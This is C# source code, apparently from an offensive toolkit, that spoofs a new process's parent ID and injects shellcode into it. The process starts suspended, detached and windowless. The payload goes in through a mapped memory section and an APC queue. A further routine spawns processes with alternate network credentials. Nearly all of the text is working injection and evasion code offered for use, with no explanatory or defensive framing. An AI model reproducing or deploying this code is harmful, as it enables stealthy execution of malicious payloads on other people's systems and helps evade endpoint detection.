public static bool CreateProcess(string processname, int ppid, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION procInfo)
{
Natives.STARTUPINFOEX sInfoEx = new Natives.STARTUPINFOEX();
sInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(sInfoEx);
IntPtr lpValue = IntPtr.Zero;
Natives.SECURITY_ATTRIBUTES pSec = new Natives.SECURITY_ATTRIBUTES();
Natives.SECURITY_ATTRIBUTES tSec = new Natives.SECURITY_ATTRIBUTES();
pSec.nLength = Marshal.SizeOf(pSec);
tSec.nLength = Marshal.SizeOf(tSec);
IntPtr pntpSec = Marshal.AllocHGlobal(Marshal.SizeOf(pSec));
Marshal.StructureToPtr(pSec, pntpSec, false);
IntPtr pnttSec = Marshal.AllocHGlobal(Marshal.SizeOf(tSec));
Marshal.StructureToPtr(tSec, pnttSec, false);
IntPtr lpSize = IntPtr.Zero;
Natives.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);
sInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
Natives.InitializeProcThreadAttributeList(sInfoEx.lpAttributeList, 1, 0, ref lpSize);
IntPtr parentHandle = Process.GetProcessById(ppid).Handle;
lpValue = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.WriteIntPtr(lpValue, parentHandle);
Natives.UpdateProcThreadAttribute(sInfoEx.lpAttributeList, 0, (IntPtr)Natives.PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
if (!Natives.CreateProcess(IntPtr.Zero, processname, pntpSec, pnttSec, false, (uint)cf, IntPtr.Zero, IntPtr.Zero, ref sInfoEx, out procInfo))
{
return(false);
}
return(true);
}
public static bool SapwnAndInjectPPID(string binary, byte[] payload, int ppid)
{
Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
Natives.CreationFlags flags = Natives.CreationFlags.CREATE_SUSPENDED | Natives.CreationFlags.DETACHED_PROCESS
| Natives.CreationFlags.CREATE_NO_WINDOW | Natives.CreationFlags.EXTENDED_STARTUPINFO_PRESENT;
if (!Spawner.CreateProcess(binary, ppid, flags, ref procInfo))
{
return(false);
}
//Round payload size to page size
uint size = InjectionHelper.GetSectionSize(payload.Length);
//Crteate section in current process
IntPtr section = IntPtr.Zero;
section = InjectionHelper.CreateSection(size, Natives.PAGE_EXECUTE_READWRITE);
if (section == IntPtr.Zero)
{
return(false);
}
//Map section to current process
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Natives.PAGE_READWRITE);
if (baseAddr == IntPtr.Zero)
{
return(false);
}
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx, Natives.PAGE_EXECUTE);
if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
{
return(false);
}
if (!InjectionHelper.UnMapViewOfSection(baseAddr))
{
return(false);
}
// Assign address of shellcode to the target apc queue
if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo))
{
return(false);
}
InjectionHelper.ResumeThread(procInfo);
Natives.CloseHandle(procInfo.hThread);
Natives.CloseHandle(procInfo.hProcess);
return(true);
}
public static bool CreateProcessWithLogonW(string username, string password, string domain, string path, string binary, string arguments, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION processInformation)
{
Natives.STARTUPINFO startupInfo = new Natives.STARTUPINFO();
startupInfo.cb = (uint)Marshal.SizeOf(typeof(Natives.STARTUPINFO));
if (!Natives.CreateProcessWithLogonW(username, domain, password,
Natives.LogonFlags.NetCredentialsOnly, path + binary, path + binary + " " + arguments, cf, 0, path, ref startupInfo, out processInformation))
{
return(false);
}
Console.WriteLine("Process created");
return(true);
}
public static bool CreateProcessWithLogonW(string path, string binary, string arguments, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION processInformation)
{
string domain;
try
{
domain = Environment.UserDomainName;
}
catch (Exception)
{
domain = System.Environment.MachineName;
}
string username = Environment.UserName;
return(CreateProcessWithLogonW(username, "password", domain, path, binary, arguments, cf, ref processInformation));
}
